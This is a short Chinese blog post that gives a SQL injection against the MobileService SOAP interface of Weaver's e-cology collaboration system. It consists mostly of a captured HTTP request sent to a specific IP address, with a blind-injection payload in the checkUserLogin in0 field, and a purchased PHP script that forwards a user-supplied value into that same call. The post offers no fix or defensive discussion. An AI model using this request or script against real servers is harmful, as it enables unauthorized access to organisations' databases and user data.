A-A+

泛微协同商务系统e-cology某处SQL注入

2016年04月19日 11:41 学习笔记 暂无评论 阅读 1,023 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /services/MobileService HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 708
Host: 220.248.212.93
Connection: Close
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
 
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="webservices.services.weaver.com.cn" xmlns:urn2="http://workflow.webservices.mobile.weaver">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:checkUserLogin>
           <urn:in0>1'and length(user)=5 and 'a'='a</urn:in0>
           <urn:in1>1</urn:in1>
           <urn:in2>1</urn:in2>
        </urn:checkUserLogin>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

上面是抓去的数据包。。

下面是测试脚本,花了6积分购买的。。。。无奈死了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
$in0=$_GET['name'];
#$in0 = $in0."' and 'a' = 'a";
header("content-type:text/html;charset=utf-8");
try {
$client = new SoapClient('http://e-cology.com.cn//services/MobileService?wsdl');
$xml = "
<SOAP-ENV:Envelope xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' xmlns:soap='http://schemas.xmlsoap.org/wsdl/soap/' xmlns:xsd='http://www.w3.org/1999/XMLSchema'  xmlns:xsi='http://www.w3.org/1999/XMLSchema-instance' xmlns:m0='http://tempuri.org/' xmlns:SOAP-ENC='http://schemas.xmlsoap.org/soap/encoding/' xmlns:urn='webservices.services.weaver.com.cn' xmlns:urn2='http://workflow.webservices.mobile.weaver'>
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:checkUserLogin>
           <urn:in0>1</urn:in0>
           <urn:in1>1</urn:in1>
           <urn:in2>1</urn:in2>
        </urn:checkUserLogin>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
$result=$client->checkUserLogin(array('in0'=>$in0,'in1'=>'123456','in2'=>1));
echo $result->out ;//显示结果  
} catch (SOAPFault $e) {
print_r('Exception:'.$e);
}
?>
标签:

给我留言